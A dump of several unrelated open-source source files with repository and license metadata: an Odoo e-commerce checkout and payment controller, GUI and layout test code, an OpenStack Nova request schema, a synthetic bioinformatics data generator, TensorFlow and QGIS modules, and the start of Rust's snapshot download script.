vat_country, vat_number = registry["res.partner"]._split_vat(data.get("vat"))
if not check_func(cr, uid, vat_country, vat_number, context=None): # simple_vat_check
error["vat"] = 'error'
if data.get("shipping_id") == -1:
for field_name in self._get_mandatory_shipping_fields():
field_name = 'shipping_' + field_name
if not data.get(field_name):
error[field_name] = 'missing'
return error
def _get_shipping_info(self, checkout):
shipping_info = {}
shipping_info.update(self.checkout_parse('shipping', checkout, True))
shipping_info['type'] = 'delivery'
return shipping_info
def checkout_form_save(self, checkout):
cr, uid, context, registry = request.cr, request.uid, request.context, request.registry
order = request.website.sale_get_order(force_create=1, context=context)
orm_partner = registry.get('res.partner')
orm_user = registry.get('res.users')
order_obj = request.registry.get('sale.order')
partner_lang = request.lang if request.lang in [lang.code for lang in request.website.language_ids] else None
billing_info = {'customer': True}
if partner_lang:
billing_info['lang'] = partner_lang
billing_info.update(self.checkout_parse('billing', checkout, True))
# set partner_id
partner_id = None
if request.uid != request.website.user_id.id:
partner_id = orm_user.browse(cr, SUPERUSER_ID, uid, context=context).partner_id.id
elif order.partner_id:
user_ids = request.registry['res.users'].search(cr, SUPERUSER_ID,
[("partner_id", "=", order.partner_id.id)], context=dict(context or {}, active_test=False))
if not user_ids or request.website.user_id.id not in user_ids:
partner_id = order.partner_id.id
# save partner informations
if partner_id and request.website.partner_id.id != partner_id:
orm_partner.write(cr, SUPERUSER_ID, [partner_id], billing_info, context=context)
else:
# create partner
partner_id = orm_partner.create(cr, SUPERUSER_ID, billing_info, context=context)
# create a new shipping partner
if checkout.get('shipping_id') == -1:
shipping_info = self._get_shipping_info(checkout)
if partner_lang:
shipping_info['lang'] = partner_lang
shipping_info['parent_id'] = partner_id
checkout['shipping_id'] = orm_partner.create(cr, SUPERUSER_ID, shipping_info, context)
order_info = {
'partner_id': partner_id,
'message_follower_ids': [(4, partner_id), (3, request.website.partner_id.id)],
'partner_invoice_id': partner_id,
}
order_info.update(order_obj.onchange_partner_id(cr, SUPERUSER_ID, [], partner_id, context=context)['value'])
address_change = order_obj.onchange_delivery_id(cr, SUPERUSER_ID, [], order.company_id.id, partner_id,
checkout.get('shipping_id'), None, context=context)['value']
order_info.update(address_change)
if address_change.get('fiscal_position'):
fiscal_update = order_obj.onchange_fiscal_position(cr, SUPERUSER_ID, [], address_change['fiscal_position'],
[(4, l.id) for l in order.order_line], context=None)['value']
order_info.update(fiscal_update)
order_info.pop('user_id')
order_info.update(partner_shipping_id=checkout.get('shipping_id') or partner_id)
order_obj.write(cr, SUPERUSER_ID, [order.id], order_info, context=context)
@http.route(['/shop/checkout'], type='http', auth="public", website=True)
def checkout(self, **post):
cr, uid, context = request.cr, request.uid, request.context
order = request.website.sale_get_order(force_create=1, context=context)
redirection = self.checkout_redirection(order)
if redirection:
return redirection
values = self.checkout_values()
return request.website.render("website_sale.checkout", values)
@http.route(['/shop/confirm_order'], type='http', auth="public", website=True)
def confirm_order(self, **post):
cr, uid, context, registry = request.cr, request.uid, request.context, request.registry
order = request.website.sale_get_order(context=context)
if not order:
return request.redirect("/shop")
redirection = self.checkout_redirection(order)
if redirection:
return redirection
values = self.checkout_values(post)
values["error"] = self.checkout_form_validate(values["checkout"])
if values["error"]:
return request.website.render("website_sale.checkout", values)
self.checkout_form_save(values["checkout"])
request.session['sale_last_order_id'] = order.id
request.website.sale_get_order(update_pricelist=True, context=context)
return request.redirect("/shop/payment")
#------------------------------------------------------
# Payment
#------------------------------------------------------
@http.route(['/shop/payment'], type='http', auth="public", website=True)
def payment(self, **post):
""" Payment step. This page proposes several payment means based on available
payment.acquirer. State at this point :
- a draft sale order with lines; otherwise, clean context / session and
back to the shop
- no transaction in context / session, or only a draft one, if the customer
did go to a payment.acquirer website but closed the tab without
paying / canceling
"""
cr, uid, context = request.cr, request.uid, request.context
payment_obj = request.registry.get('payment.acquirer')
sale_order_obj = request.registry.get('sale.order')
order = request.website.sale_get_order(context=context)
redirection = self.checkout_redirection(order)
if redirection:
return redirection
shipping_partner_id = False
if order:
if order.partner_shipping_id.id:
shipping_partner_id = order.partner_shipping_id.id
else:
shipping_partner_id = order.partner_invoice_id.id
values = {
'order': request.registry['sale.order'].browse(cr, SUPERUSER_ID, order.id, context=context)
}
values['errors'] = sale_order_obj._get_errors(cr, uid, order, context=context)
values.update(sale_order_obj._get_website_data(cr, uid, order, context))
# fetch all registered payment means
# if tx:
# acquirer_ids = [tx.acquirer_id.id]
# else:
if not values['errors']:
acquirer_ids = payment_obj.search(cr, SUPERUSER_ID, [('website_published', '=', True), ('company_id', '=', order.company_id.id)], context=context)
values['acquirers'] = list(payment_obj.browse(cr, uid, acquirer_ids, context=context))
render_ctx = dict(context, submit_class='btn btn-primary', submit_txt=_('Pay Now'))
for acquirer in values['acquirers']:
acquirer.button = payment_obj.render(
cr, SUPERUSER_ID, acquirer.id,
order.name,
order.amount_total,
order.pricelist_id.currency_id.id,
partner_id=shipping_partner_id,
tx_values={
'return_url': '/shop/payment/validate',
},
context=render_ctx)
return request.website.render("website_sale.payment", values)
@http.route(['/shop/payment/transaction/<int:acquirer_id>'], type='json', auth="public", website=True)
def payment_transaction(self, acquirer_id):
""" Json method that creates a payment.transaction, used to create a
transaction when the user clicks on 'pay now' button. After having
created the transaction, the event continues and the user is redirected
to the acquirer website.
:param int acquirer_id: id of a payment.acquirer record. If not set the
user is redirected to the checkout page
"""
cr, uid, context = request.cr, request.uid, request.context
transaction_obj = request.registry.get('payment.transaction')
order = request.website.sale_get_order(context=context)
if not order or not order.order_line or acquirer_id is None:
return request.redirect("/shop/checkout")
assert order.partner_id.id != request.website.partner_id.id
# find an already existing transaction
tx = request.website.sale_get_transaction()
if tx:
if tx.state == 'draft': # button cliked but no more info -> rewrite on tx or create a new one ?
tx.write({
'acquirer_id': acquirer_id,
'amount': order.amount_total,
})
tx_id = tx.id
else:
tx_id = transaction_obj.create(cr, SUPERUSER_ID, {
'acquirer_id': acquirer_id,
'type': 'form',
'amount': order.amount_total,
'currency_id': order.pricelist_id.currency_id.id,
'partner_id': order.partner_id.id,
'partner_country_id': order.partner_id.country_id.id,
'reference': order.name,
'sale_order_id': order.id,
}, context=context)
request.session['sale_transaction_id'] = tx_id
# update quotation
request.registry['sale.order'].write(
cr, SUPERUSER_ID, [order.id], {
'payment_acquirer_id': acquirer_id,
'payment_tx_id': request.session['sale_transaction_id']
}, context=context)
return tx_id
@http.route('/shop/payment/get_status/<int:sale_order_id>', type='json', auth="public", website=True)
def payment_get_status(self, sale_order_id, **post):
cr, uid, context = request.cr, request.uid, request.context
order = request.registry['sale.order'].browse(cr, SUPERUSER_ID, sale_order_id, context=context)
assert order.id == request.session.get('sale_last_order_id')
if not order:
return {
'state': 'error',
'message': '<p>%s</p>' % _('There seems to be an error with your request.'),
}
tx_ids = request.registry['payment.transaction'].search(
cr, SUPERUSER_ID, [
'|', ('sale_order_id', '=', order.id), ('reference', '=', order.name)
], context=context)
if not tx_ids:
if order.amount_total:
return {
'state': 'error',
'message': '<p>%s</p>' % _('There seems to be an error with your request.'),
}
else:
state = 'done'
message = ""
validation = None
else:
tx = request.registry['payment.transaction'].browse(cr, SUPERUSER_ID, tx_ids[0], context=context)
state = tx.state
if state == 'done':
message = '<p>%s</p>' % _('Your payment has been received.')
elif state == 'cancel':
message = '<p>%s</p>' % _('The payment seems to have been canceled.')
elif state == 'pending' and tx.acquirer_id.validation == 'manual':
message = '<p>%s</p>' % _('Your transaction is waiting confirmation.')
if tx.acquirer_id.post_msg:
message += tx.acquirer_id.post_msg
elif state == 'error':
message = '<p>%s</p>' % _('An error occurred during the transaction.')
validation = tx.acquirer_id.validation
return {
'state': state,
'message': message,
'validation': validation
}
@http.route('/shop/payment/validate', type='http', auth="public", website=True)
def payment_validate(self, transaction_id=None, sale_order_id=None, **post):
""" Method that should be called by the server when receiving an update
for a transaction. State at this point :
         - UPDATE ME
"""
cr, uid, context = request.cr, request.uid, request.context
email_act = None
sale_order_obj = request.registry['sale.order']
if transaction_id is None:
tx = request.website.sale_get_transaction()
else:
tx = request.registry['payment.transaction'].browse(cr, uid, transaction_id, context=context)
if sale_order_id is None:
order = request.website.sale_get_order(context=context)
else:
order = request.registry['sale.order'].browse(cr, SUPERUSER_ID, sale_order_id, context=context)
assert order.id == request.session.get('sale_last_order_id')
if not order or (order.amount_total and not tx):
return request.redirect('/shop')
if (not order.amount_total and not tx) or tx.state in ['pending', 'done']:
if (not order.amount_total and not tx):
                # Orders are confirmed by payment transactions, but there is none
                # for free orders (e.g. free events), so confirm immediately
order.with_context(dict(context, send_email=True)).action_button_confirm()
elif tx and tx.state == 'cancel':
# cancel the quotation
sale_order_obj.action_cancel(cr, SUPERUSER_ID, [order.id], context=request.context)
# clean context and session, then redirect to the confirmation page
request.website.sale_reset(context=context)
if tx and tx.state == 'draft':
return request.redirect('/shop')
return request.redirect('/shop/confirmation')
@http.route(['/shop/confirmation'], type='http', auth="public", website=True)
def payment_confirmation(self, **post):
""" End of checkout process controller. Confirmation is basically seing
the status of a sale.order. State at this point :
- should not have any context / session info: clean them
- take a sale.order id, because we request a sale.order and are not
session dependant anymore
"""
cr, uid, context = request.cr, request.uid, request.context
sale_order_id = request.session.get('sale_last_order_id')
if sale_order_id:
order = request.registry['sale.order'].browse(cr, SUPERUSER_ID, sale_order_id, context=context)
else:
return request.redirect('/shop')
return request.website.render("website_sale.confirmation", {'order': order})
#------------------------------------------------------
# Edit
#------------------------------------------------------
@http.route(['/shop/add_product'], type='http', auth="user", methods=['POST'], website=True)
def add_product(self, name=None, category=0, **post):
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
if not name:
name = _("New Product")
product_obj = request.registry.get('product.product')
product_id = product_obj.create(cr, uid, { 'name': name, 'public_categ_ids': category }, context=context)
product = product_obj.browse(cr, uid, product_id, context=context)
return request.redirect("/shop/product/%s?enable_editor=1" % slug(product.product_tmpl_id))
@http.route(['/shop/change_styles'], type='json', auth="public")
def change_styles(self, id, style_id):
product_obj = request.registry.get('product.template')
product = product_obj.browse(request.cr, request.uid, id, context=request.context)
remove = []
active = False
for style in product.website_style_ids:
if style.id == style_id:
remove.append(style.id)
active = True
break
style = request.registry.get('product.style').browse(request.cr, request.uid, style_id, context=request.context)
if remove:
product.write({'website_style_ids': [(3, rid) for rid in remove]})
if not active:
product.write({'website_style_ids': [(4, style.id)]})
return not active
@http.route(['/shop/change_sequence'], type='json', auth="public")
def change_sequence(self, id, sequence):
product_obj = request.registry.get('product.template')
if sequence == "top":
product_obj.set_sequence_top(request.cr, request.uid, [id], context=request.context)
elif sequence == "bottom":
product_obj.set_sequence_bottom(request.cr, request.uid, [id], context=request.context)
elif sequence == "up":
product_obj.set_sequence_up(request.cr, request.uid, [id], context=request.context)
elif sequence == "down":
product_obj.set_sequence_down(request.cr, request.uid, [id], context=request.context)
@http.route(['/shop/change_size'], type='json', auth="public")
def change_size(self, id, x, y):
product_obj = request.registry.get('product.template')
product = product_obj.browse(request.cr, request.uid, id, context=request.context)
return product.write({'website_size_x': x, 'website_size_y': y})
def order_lines_2_google_api(self, order_lines):
""" Transforms a list of order lines into a dict for google analytics """
ret = []
for line in order_lines:
product = line.product_id
ret.append({
'id': line.order_id and line.order_id.id,
'sku': product.ean13 or product.id,
'name': product.name or '-',
'category': product.categ_id and product.categ_id.name or '-',
'price': line.price_unit,
'quantity': line.product_uom_qty,
})
return ret
def order_2_return_dict(self, order):
""" Returns the tracking_cart dict of the order for Google analytics basically defined to be inherited """
return {
'transaction': {
'id': order.id,
'affiliation': order.company_id.name,
'revenue': order.amount_total,
'tax': order.amount_tax,
'currency': order.currency_id.name
},
'lines': self.order_lines_2_google_api(order.order_line)
}
@http.route(['/shop/tracking_last_order'], type='json', auth="public")
def tracking_cart(self, **post):
""" return data about order in JSON needed for google analytics"""
cr, context = request.cr, request.context
ret = {}
sale_order_id = request.session.get('sale_last_order_id')
if sale_order_id:
order = request.registry['sale.order'].browse(cr, SUPERUSER_ID, sale_order_id, context=context)
ret = self.order_2_return_dict(order)
return ret
@http.route(['/shop/get_unit_price'], type='json', auth="public", methods=['POST'], website=True)
def get_unit_price(self, product_ids, add_qty, use_order_pricelist=False, **kw):
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
products = pool['product.product'].browse(cr, uid, product_ids, context=context)
partner = pool['res.users'].browse(cr, uid, uid, context=context).partner_id
if use_order_pricelist:
pricelist_id = request.session.get('sale_order_code_pricelist_id') or partner.property_product_pricelist.id
else:
pricelist_id = partner.property_product_pricelist.id
prices = pool['product.pricelist'].price_rule_get_multi(cr, uid, [], [(product, add_qty, partner) for product in products], context=context)
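        # The result of price_rule_get_multi is assumed to map
        # product id -> {pricelist id: (price, rule id)}, so the dict returned
        # below gives the unit price of each requested product under the
        # selected pricelist.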
return {product_id: prices[product_id][pricelist_id][0] for product_id in product_ids}
# vim:expandtab:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
yzl0083/orange
|
Orange/OrangeCanvas/canvas/tests/test_layout.py
|
13
|
2566
|
import time
from PyQt4.QtGui import QGraphicsView, QPainter, QPainterPath
from ...gui.test import QAppTestCase
from ..layout import AnchorLayout
from ..scene import CanvasScene
from ..items import NodeItem, LinkItem
class TestAnchorLayout(QAppTestCase):
def setUp(self):
QAppTestCase.setUp(self)
self.scene = CanvasScene()
self.view = QGraphicsView(self.scene)
self.view.setRenderHint(QPainter.Antialiasing)
self.view.show()
self.view.resize(600, 400)
def test_layout(self):
file_desc, disc_desc, bayes_desc = self.widget_desc()
file_item = NodeItem()
file_item.setWidgetDescription(file_desc)
file_item.setPos(0, 150)
self.scene.add_node_item(file_item)
bayes_item = NodeItem()
bayes_item.setWidgetDescription(bayes_desc)
bayes_item.setPos(200, 0)
self.scene.add_node_item(bayes_item)
disc_item = NodeItem()
disc_item.setWidgetDescription(disc_desc)
disc_item.setPos(200, 300)
self.scene.add_node_item(disc_item)
link = LinkItem()
link.setSourceItem(file_item)
link.setSinkItem(disc_item)
self.scene.add_link_item(link)
link = LinkItem()
link.setSourceItem(file_item)
link.setSinkItem(bayes_item)
self.scene.add_link_item(link)
layout = AnchorLayout()
self.scene.addItem(layout)
self.scene.set_anchor_layout(layout)
layout.invalidateNode(file_item)
layout.activate()
p1, p2 = file_item.outputAnchorItem.anchorPositions()
self.assertTrue(p1 > p2)
self.scene.node_item_position_changed.connect(layout.invalidateNode)
path = QPainterPath()
path.addEllipse(125, 0, 50, 300)
def advance():
t = time.clock()
bayes_item.setPos(path.pointAtPercent(t % 1.0))
disc_item.setPos(path.pointAtPercent((t + 0.5) % 1.0))
self.singleShot(20, advance)
advance()
self.app.exec_()
def widget_desc(self):
from ...registry.tests import small_testing_registry
reg = small_testing_registry()
file_desc = reg.widget(
"Orange.OrangeWidgets.Data.OWFile.OWFile"
)
discretize_desc = reg.widget(
"Orange.OrangeWidgets.Data.OWDiscretize.OWDiscretize"
)
bayes_desc = reg.widget(
"Orange.OrangeWidgets.Classify.OWNaiveBayes.OWNaiveBayes"
)
return file_desc, discretize_desc, bayes_desc
|
gpl-3.0
|
blueboxgroup/nova
|
nova/api/openstack/compute/schemas/v3/multinic.py
|
90
|
1571
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.validation import parameter_types
add_fixed_ip = {
'type': 'object',
'properties': {
'addFixedIp': {
'type': 'object',
'properties': {
# The maxLength is from the column 'uuid' of the
# table 'networks'
'networkId': {
'type': ['string', 'number'],
'minLength': 1, 'maxLength': 36,
},
},
'required': ['networkId'],
'additionalProperties': False,
},
},
'required': ['addFixedIp'],
'additionalProperties': False,
}
remove_fixed_ip = {
'type': 'object',
'properties': {
'removeFixedIp': {
'type': 'object',
'properties': {
'address': parameter_types.ip_address
},
'required': ['address'],
'additionalProperties': False,
},
},
'required': ['removeFixedIp'],
'additionalProperties': False,
}
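# Illustrative request bodies (assumptions based on the schemas above, not
# taken from the Nova sources): add_fixed_ip would accept e.g.
#     {"addFixedIp": {"networkId": "d32019d3-bc6e-4319-9c1d-6722fc136a22"}}
# (networkId may also be given as a number), and remove_fixed_ip would accept
#     {"removeFixedIp": {"address": "192.168.1.10"}}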
|
apache-2.0
|
jostmey/MaxSnippetModel
|
dataplumbing_synthetic_data.py
|
1
|
2627
|
#########################################################################################
# Author: Jared L. Ostmeyer
# Date Started: 2016-07-26
# Environment: Python3
# License: See LICENSE
# Purpose: Generate synthetic dataset and create interfaces for piping the data to the model.
# Note: Overwrite "dataplumbing.py" with this file to use synthetic data.
##########################################################################################
import numpy as np
import lib_paths
import atchley_factors as vector_representation
def load_repertoires(data_dir):
return None
def process_repertoires(repertoires, snip_size=6):
# NOTE:
#
    # This script creates a set of random snippets (k-mers) for each sample.
# If this were real data from immune receptor sequences, you would take each
# CDR3 sequence in a sample, cut it up into every possible snippet (k-mer),
# and use those snippets (see EXAMPLE below). The snippet count would be the total number of
# times the snippet appeared in all of the CDR3 sequences from a sample.
#
# EXAMPLE:
#
# Assume this is your CDR3:
# ACTRGHKCILR
# The snippets are:
# ACTRGH
    #         CTRGHK
# TRGHKC
# RGHKCI
# GHKCIL
# HKCILR
    # This must be done for every CDR3 in the sample. After converting the snippets
# into a vector representation (Atchley factors), the values are stored in "xs".
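    # A minimal sketch (illustrative only, not executed below) of cutting a
    # CDR3 into overlapping snippets of length snip_size:
    #
    #     cdr3 = 'ACTRGHKCILR'
    #     snippets = [cdr3[i:i + snip_size] for i in range(len(cdr3) - snip_size + 1)]
    #     # -> ['ACTRGH', 'CTRGHK', 'TRGHKC', 'RGHKCI', 'GHKCIL', 'HKCILR']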
# Data dimensions
#
num_samples = 20
num_snips_per_sample = 300
snip_size = 6
num_features = snip_size*vector_representation.length
# Data variables
#
xs = np.zeros((num_samples, num_snips_per_sample, num_features), dtype=np.float32) # Features
cs = np.zeros((num_samples, num_snips_per_sample), dtype=np.float32) # Snippet count
ys = np.zeros((num_samples), dtype=np.float32) # Labels
# Generate random snippets
#
aa_list = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']
for i in range(num_samples):
N = np.random.randint(round(num_snips_per_sample/2))+round(num_snips_per_sample/2)-1
for j in range(N):
snip = ''
for k in range(snip_size):
index = np.random.randint(len(aa_list))
snip += aa_list[index]
xs[i,j,:] = vector_representation.features(snip)
cs[i,j] = 1.0
# Place needle in some samples and give those samples a positive diagnosis
#
needle = 'ARKIHG'
for i in range(round(num_samples/2)):
ys[i] = 1.0
xs[i,0,:] = vector_representation.features(needle)
return xs, cs, ys
|
bsd-3-clause
|
D4wN/brickv
|
src/brickv/plugin_system/plugins/red/program_page_csharp.py
|
1
|
9064
|
# -*- coding: utf-8 -*-
"""
RED Plugin
Copyright (C) 2014 Olaf Lüke <[email protected]>
Copyright (C) 2014-2015 Matthias Bolte <[email protected]>
program_page_csharp.py: Program Wizard C# Page
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public
License along with this program; if not, write to the
Free Software Foundation, Inc., 59 Temple Place - Suite 330,
Boston, MA 02111-1307, USA.
"""
from brickv.plugin_system.plugins.red.program_page import ProgramPage
from brickv.plugin_system.plugins.red.program_utils import *
from brickv.plugin_system.plugins.red.ui_program_page_csharp import Ui_ProgramPageCSharp
from brickv.plugin_system.plugins.red.script_manager import check_script_result
def get_mono_versions(script_manager, callback):
def cb_versions(result):
okay, _ = check_script_result(result)
if okay:
try:
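                # result.stdout is assumed to start with a line such as
                # "Mono JIT compiler version 3.2.8 (Debian ...)", so the fifth
                # space-separated token is taken as the version number.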
version = result.stdout.split('\n')[0].split(' ')[4]
callback([ExecutableVersion('/usr/bin/mono', version)])
return
except:
pass
        # Could not get versions; we assume that some version of Mono 3.2 is installed
callback([ExecutableVersion('/usr/bin/mono', '3.2')])
script_manager.execute_script('mono_versions', cb_versions)
class ProgramPageCSharp(ProgramPage, Ui_ProgramPageCSharp):
def __init__(self, title_prefix=''):
ProgramPage.__init__(self)
self.setupUi(self)
self.language = Constants.LANGUAGE_CSHARP
self.setTitle('{0}{1} Configuration'.format(title_prefix, Constants.language_display_names[self.language]))
self.registerField('csharp.version', self.combo_version)
self.registerField('csharp.start_mode', self.combo_start_mode)
self.registerField('csharp.executable', self.combo_executable, 'currentText')
self.registerField('csharp.working_directory', self.combo_working_directory, 'currentText')
self.combo_start_mode.currentIndexChanged.connect(self.update_ui_state)
self.combo_start_mode.currentIndexChanged.connect(self.completeChanged.emit)
self.check_show_advanced_options.stateChanged.connect(self.update_ui_state)
self.label_spacer.setText('')
self.combo_executable_selector = MandatoryTypedFileSelector(self,
self.label_executable,
self.combo_executable,
self.label_executable_type,
self.combo_executable_type,
self.label_executable_help)
self.combo_working_directory_selector = MandatoryDirectorySelector(self,
self.label_working_directory,
self.combo_working_directory)
self.option_list_editor = ListWidgetEditor(self.label_options,
self.list_options,
self.label_options_help,
self.button_add_option,
self.button_remove_option,
self.button_up_option,
self.button_down_option,
'<new Mono option {0}>')
# overrides QWizardPage.initializePage
def initializePage(self):
self.set_formatted_sub_title(u'Specify how the {language} program [{name}] should be executed.')
self.update_combo_version('mono', self.combo_version)
self.combo_start_mode.setCurrentIndex(Constants.DEFAULT_CSHARP_START_MODE)
self.combo_executable_selector.reset()
self.check_show_advanced_options.setChecked(False)
self.combo_working_directory_selector.reset()
self.option_list_editor.reset()
# if a program exists then this page is used in an edit wizard
program = self.wizard().program
if program != None:
# start mode
start_mode_api_name = program.cast_custom_option_value('csharp.start_mode', unicode, '<unknown>')
start_mode = Constants.get_csharp_start_mode(start_mode_api_name)
self.combo_start_mode.setCurrentIndex(start_mode)
# executable
self.combo_executable_selector.set_current_text(program.cast_custom_option_value('csharp.executable', unicode, ''))
# working directory
self.combo_working_directory_selector.set_current_text(program.working_directory)
# options
self.option_list_editor.clear()
for option in program.cast_custom_option_value_list('csharp.options', unicode, []):
self.option_list_editor.add_item(option)
self.update_ui_state()
# overrides QWizardPage.isComplete
def isComplete(self):
executable = self.get_executable()
start_mode = self.get_field('csharp.start_mode')
if len(executable) == 0:
return False
if start_mode == Constants.CSHARP_START_MODE_EXECUTABLE and \
not self.combo_executable_selector.complete:
return False
return self.combo_working_directory_selector.complete and ProgramPage.isComplete(self)
# overrides ProgramPage.update_ui_state
def update_ui_state(self):
start_mode = self.get_field('csharp.start_mode')
start_mode_executable = start_mode == Constants.CSHARP_START_MODE_EXECUTABLE
show_advanced_options = self.check_show_advanced_options.isChecked()
self.label_executable.setVisible(start_mode_executable)
self.label_executable_type.setVisible(start_mode_executable)
self.combo_executable.setVisible(start_mode_executable)
self.combo_executable_type.setVisible(start_mode_executable)
self.label_executable_help.setVisible(start_mode_executable)
self.combo_working_directory_selector.set_visible(show_advanced_options)
self.option_list_editor.set_visible(show_advanced_options)
self.label_spacer.setVisible(not show_advanced_options)
self.option_list_editor.update_ui_state()
def get_executable(self):
return self.combo_version.itemData(self.get_field('csharp.version'))
def get_html_summary(self):
version = self.get_field('csharp.version')
start_mode = self.get_field('csharp.start_mode')
executable = self.get_field('csharp.executable')
working_directory = self.get_field('csharp.working_directory')
options = ' '.join(self.option_list_editor.get_items())
html = u'Mono Version: {0}<br/>'.format(Qt.escape(self.combo_version.itemText(version)))
html += u'Start Mode: {0}<br/>'.format(Qt.escape(Constants.csharp_start_mode_display_names[start_mode]))
if start_mode == Constants.CSHARP_START_MODE_EXECUTABLE:
html += u'Executable: {0}<br/>'.format(Qt.escape(executable))
html += u'Working Directory: {0}<br/>'.format(Qt.escape(working_directory))
html += u'Mono Options: {0}<br/>'.format(Qt.escape(options))
return html
def get_custom_options(self):
return {
'csharp.start_mode': Constants.csharp_start_mode_api_names[self.get_field('csharp.start_mode')],
'csharp.executable': self.get_field('csharp.executable'),
'csharp.options': self.option_list_editor.get_items()
}
def get_command(self):
executable = self.get_executable()
arguments = self.option_list_editor.get_items()
environment = []
start_mode = self.get_field('csharp.start_mode')
if start_mode == Constants.CSHARP_START_MODE_EXECUTABLE:
arguments.append(self.get_field('csharp.executable'))
working_directory = self.get_field('csharp.working_directory')
return executable, arguments, environment, working_directory
def apply_program_changes(self):
self.apply_program_custom_options_and_command_changes()
|
gpl-2.0
|
JingJunYin/tensorflow
|
tensorflow/contrib/keras/api/keras/utils/__init__.py
|
51
|
2105
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras._impl.keras.utils.data_utils import GeneratorEnqueuer
from tensorflow.python.keras._impl.keras.utils.data_utils import get_file
from tensorflow.python.keras._impl.keras.utils.data_utils import Sequence
from tensorflow.python.keras._impl.keras.utils.data_utils import SequenceEnqueuer
from tensorflow.python.keras._impl.keras.utils.generic_utils import custom_object_scope
from tensorflow.python.keras._impl.keras.utils.generic_utils import CustomObjectScope
from tensorflow.python.keras._impl.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras._impl.keras.utils.generic_utils import get_custom_objects
from tensorflow.python.keras._impl.keras.utils.generic_utils import Progbar
from tensorflow.python.keras._impl.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.keras._impl.keras.utils.io_utils import HDF5Matrix
from tensorflow.python.keras._impl.keras.utils.layer_utils import convert_all_kernels_in_model
from tensorflow.python.keras._impl.keras.utils.np_utils import normalize
from tensorflow.python.keras._impl.keras.utils.np_utils import to_categorical
from tensorflow.python.keras._impl.keras.utils.vis_utils import plot_model
del absolute_import
del division
del print_function
|
apache-2.0
|
gioman/QGIS
|
python/plugins/processing/algs/gdal/roughness.py
|
1
|
2919
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
roughness.py
---------------------
Date : October 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import str
__author__ = 'Alexander Bruy'
__date__ = 'October 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterNumber
from processing.core.outputs import OutputRaster
from processing.algs.gdal.GdalUtils import GdalUtils
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class roughness(GdalAlgorithm):
INPUT = 'INPUT'
BAND = 'BAND'
COMPUTE_EDGES = 'COMPUTE_EDGES'
OUTPUT = 'OUTPUT'
def group(self):
return self.tr('Raster analysis')
def name(self):
return 'roughness'
def displayName(self):
return self.tr('Roughness')
def defineCharacteristics(self):
self.addParameter(ParameterRaster(self.INPUT, self.tr('Input layer')))
self.addParameter(ParameterNumber(self.BAND,
self.tr('Band number'), 1, 99, 1))
self.addParameter(ParameterBoolean(self.COMPUTE_EDGES,
self.tr('Compute edges'), False))
self.addOutput(OutputRaster(self.OUTPUT, self.tr('Roughness')))
def getConsoleCommands(self):
arguments = ['roughness']
arguments.append(str(self.getParameterValue(self.INPUT)))
output = str(self.getOutputValue(self.OUTPUT))
arguments.append(output)
arguments.append('-of')
arguments.append(GdalUtils.getFormatShortNameFromFilename(output))
arguments.append('-b')
arguments.append(str(self.getParameterValue(self.BAND)))
if self.getParameterValue(self.COMPUTE_EDGES):
arguments.append('-compute_edges')
return ['gdaldem', GdalUtils.escapeAndJoin(arguments)]
|
gpl-2.0
|
miniupnp/rust
|
src/etc/snapshot.py
|
37
|
8006
|
# Copyright 2011-2015 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
import re
import os
import sys
import glob
import tarfile
import shutil
import subprocess
import distutils.spawn
try:
import hashlib
sha_func = hashlib.sha1
except ImportError:
import sha
sha_func = sha.new
def scrub(b):
if sys.version_info >= (3,) and type(b) == bytes:
return b.decode('ascii')
else:
return b
src_dir = scrub(os.getenv("CFG_SRC_DIR"))
if not src_dir:
raise Exception("missing env var CFG_SRC_DIR")
snapshotfile = os.path.join(src_dir, "src", "snapshots.txt")
download_url_base = "https://static.rust-lang.org/stage0-snapshots"
download_dir_base = "dl"
download_unpack_base = os.path.join(download_dir_base, "unpack")
snapshot_files = {
"linux": ["bin/rustc"],
"macos": ["bin/rustc"],
